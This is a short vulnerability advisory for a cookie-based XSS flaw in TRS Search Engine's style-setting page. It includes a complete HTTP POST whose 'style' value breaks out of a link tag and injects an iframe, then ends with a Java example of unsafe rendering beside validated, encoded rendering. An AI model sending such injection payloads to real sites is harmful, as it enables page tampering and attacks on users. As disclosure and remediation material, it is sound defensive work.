TRS Search Engine Code Injection Vulnerability

Affected versions:
WAS 4.0 + Tomcat 4.0 for Windows
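Vulnerability description:
TRS Search Engine is the platform of choice from TRS for building intelligent, personalized, enterprise-grade search engines.

The "Style Settings" module of TRS Search Engine contains a flaw that allows a malicious attacker to plant arbitrary code in the page. (cookies xss)
<*Reference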
Email:wsn1983#gmail.com
blog:http://hi.baidu.com/nansec
*>
Security advice:
None at this time
Test method:
———————————————————
POST /was40/dosetstyle.jsp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: http://site:8080/was40/setstyle.jsp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: site_ip:8080
Content-Length: 13
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: styleCookie=default; JSESSIONID=8C2613D2A5FD270091960DF9EE76CCA3

style=default.css" type="text/css"><iframe src=http://www.baidu.com></iframe><link href="css/style_default
———————————————————-

In the HTML page:

<link href="css/style_default.css" type="text/css"><iframe src=http://hi.baidu.com/nansec></iframe><link href="css/style_default.css" rel="stylesheet" type="text/css">
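
The Java example below is added here and is not part of the original advisory or of TRS's code. It shows the unsafe concatenation that produces the output above next to a validated and encoded rendering of the same value. The class name, method names and allowlist pattern are assumptions, and the template string is inferred from the HTML shown above.

```java
import java.util.regex.Pattern;

public class StyleLinkDemo {
    // Assumption: theme names are short tokens such as "default"; anything else is rejected.
    private static final Pattern SAFE_STYLE = Pattern.compile("[A-Za-z0-9_-]{1,32}");

    // Unsafe rendering, inferred from the page's output: the value is concatenated as-is.
    static String renderUnsafe(String style) {
        return "<link href=\"css/style_" + style + ".css\" rel=\"stylesheet\" type=\"text/css\">";
    }

    // Allowlist check, to be applied when the POST parameter is stored in the
    // cookie and again when the cookie value is read back for rendering.
    static String sanitizeStyle(String style) {
        return (style != null && SAFE_STYLE.matcher(style).matches()) ? style : "default";
    }

    // Defence in depth: encode for an HTML attribute context even after validation.
    static String escapeAttr(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    static String renderSafe(String style) {
        return "<link href=\"css/style_" + escapeAttr(sanitizeStyle(style))
                + ".css\" rel=\"stylesheet\" type=\"text/css\">";
    }

    public static void main(String[] args) {
        // The style value from the request shown on this page.
        String posted = "default.css\" type=\"text/css\"><iframe src=http://www.baidu.com></iframe>"
                + "<link href=\"css/style_default";
        System.out.println(renderUnsafe(posted)); // value closes the href attribute and adds markup
        System.out.println(renderSafe(posted));   // value fails the allowlist, default theme is used
        System.out.println(renderSafe("blue"));   // constructed example of a valid theme name
    }
}
```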
